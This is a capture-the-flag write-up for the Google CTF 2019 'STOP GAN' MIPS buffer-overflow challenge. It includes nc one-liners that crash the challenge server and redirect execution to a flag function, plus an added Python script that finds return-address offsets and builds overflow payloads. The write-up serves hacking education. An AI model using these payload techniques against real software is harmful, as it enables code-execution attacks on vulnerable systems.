Google CTF 2019 // #05-1 STOP GAN (bof)

Writeup Series

Success, you’ve gotten the picture of your lost love, not knowing that pictures and the things you take pictures of are generally two separate things, you think you’ve rescued them and their brethren by downloading them all to your ship’s hard drive. They’re still being eaten, but this is a fact that has escaped you entirely. Your thoughts swiftly shift to revenge. It’s important now to stop this program from destroying these “Cauliflowers” as they’re referred to, ever again.


buffer-overflow.ctfcompetition.com 1337

Once again, we were given a server address with a port and a zip attachment containing two files.

  • -rw-r--r--@ 1 maya staff 661K Nov 30 1979 bof
  • -rw-r--r--@ 1 maya staff 1.1K Nov 30 1979 console.c

Doing a quick file check on bof reveals it to be a 32-bit MIPS ELF executable.

Let’s try to connect to the server above first.

The banner tells us that we’re supposed to crash the server. Opening up console.c reveals that it seems to be the program running on the server itself: it reads our commands and routes all further input into the bof binary.

Time to fire up Ghidra and reverse engineer the bof file. Luckily Ghidra supports MIPS architecture.

From the decompiled code, we can see that the input buffer is 260 bytes, but scanf reads into it without any length limit. Anything longer than 260 bytes therefore runs past the buffer, and that is the overflow we want to use to crash the program.

Now, the fastest way to send more than 260 bytes to the server, short of typing the character A more than 260 times by hand, is a quick Python one-liner piped into nc.

python -c 'print "run\n" + "A"*300' | nc -v buffer-overflow.ctfcompetition.com 1337

This uses Python to enter run (the console command that starts bof) followed by 300 As, which is well past the 260-byte buffer and causes the overflow.

There we go, we got the flag. Now on to the bonus flag. For that we need a controlled crash rather than a plain one: we have to redirect execution instead of just faulting. A quick search of the bof binary for the word flag yields a couple of results.

The local_flag function seems promising. Let’s try to land ourselves near that marker.

After some trial and error, we find that the first 264 As fill the buffer and the padding after it, and the next 4 bytes overwrite the saved return address. So we send 264 As followed by the address of local_flag, written in little-endian byte order as this is a little-endian MIPS binary (0x00400850 becomes \x50\x08\x40\x00). Another quick Python one-liner does it.

python -c 'print "run\n" + "A"*(264)+"\x50\x08\x40\x00"' | nc -v buffer-overflow.ctfcompetition.com 1337

And finally, we got the bonus flag too.
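The two steps above (finding the distance to the saved return address, then padding and appending a target address) are the same every time, so here is an added helper script that automates them. It is not part of the original writeup or of the challenge files. It assumes what the writeup found: a little-endian MIPS target, a return-address slot at offset 264, and 0x00400850 as the address of local_flag (decoded from the bytes in the one-liner above). Instead of trial and error, it sends a De Bruijn (cyclic) pattern, so that whatever 4-byte value shows up in the crashed return address maps back to exactly one offset. It also refuses addresses containing bytes that scanf("%s") treats as whitespace, since scanf stops copying at the first one and the tail of the payload would never reach the stack.

```python
#!/usr/bin/env python3
"""Offset finder and payload builder for a scanf("%s") stack overflow.

Added example for the GCTF 2019 "STOP GAN (bof)" writeup; the offsets
and addresses below are taken from that writeup, everything else is
a hypothetical helper.
"""
import struct
import sys

# scanf("%s") skips leading whitespace and stops at the first whitespace
# byte, so none of these may appear inside the overflow payload. A NUL
# byte is *not* whitespace and passes through fine (0x00400850 ends in 0x00).
SCANF_WHITESPACE = frozenset(b" \t\n\v\f\r")

# Values from the writeup (assumed, not re-derived here).
COMMAND = b"run\n"        # console.c command that launches bof
RET_OFFSET = 264          # bytes of filler before the saved return address
LOCAL_FLAG_ADDR = 0x00400850
ENDIAN = "<"              # little-endian MIPS: struct format prefix


def cyclic_pattern(length, alphabet=b"ABCDEFGHIJKLMNOPQRSTUVWXYZ", n=4):
    """Return `length` bytes in which every n-byte window is unique.

    Standard De Bruijn sequence B(k, n) over `alphabet`; the prefix of a
    De Bruijn sequence keeps the unique-window property, so we can slice.
    Uppercase letters only, so the pattern never contains scanf whitespace.
    """
    k = len(alphabet)
    if length > k ** n:
        raise ValueError("pattern longer than the De Bruijn period")
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def cyclic_offset(pattern, needle):
    """Offset of the 4 bytes found in the crashed RA/PC, or -1 if absent."""
    return pattern.find(needle)


def ra_to_offset(pattern, ra_value, endian=ENDIAN):
    """Same lookup, but starting from the register value read out of a
    crash report (e.g. from gdb/qemu), converting it back into bytes."""
    return cyclic_offset(pattern, struct.pack(endian + "I", ra_value))


def address_bad_bytes(target, endian=ENDIAN):
    """Bytes of the encoded address that scanf("%s") would stop at."""
    return [b for b in struct.pack(endian + "I", target) if b in SCANF_WHITESPACE]


def build_payload(offset, target, command=COMMAND, filler=b"A", endian=ENDIAN):
    """command + filler*offset + little-endian target address.

    The trailing newline print/echo adds afterwards is harmless: it
    terminates %s only after the address has already been copied.
    """
    bad = address_bad_bytes(target, endian)
    if bad:
        raise ValueError("address contains scanf whitespace bytes: %r" % bad)
    return command + filler * offset + struct.pack(endian + "I", target)


if __name__ == "__main__":
    # Usage:  python3 bof_payload.py pattern 300 | nc buffer-overflow.ctfcompetition.com 1337
    #         python3 bof_payload.py flag | nc buffer-overflow.ctfcompetition.com 1337
    if len(sys.argv) > 1 and sys.argv[1] == "pattern":
        out = COMMAND + cyclic_pattern(int(sys.argv[2]) if len(sys.argv) > 2 else 300) + b"\n"
    else:
        out = build_payload(RET_OFFSET, LOCAL_FLAG_ADDR) + b"\n"
    sys.stdout.buffer.write(out)
```

Run it once in pattern mode, read the 4 bytes (or the register value) that land in the return address out of the crash, and feed them to cyclic_offset or ra_to_offset to get the 264 in one shot. If the address you want to jump to contains 0x0a or 0x20, build_payload refuses it, which is the right time to look for a different gadget or entry point rather than wondering why the program only ever crashes plainly.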
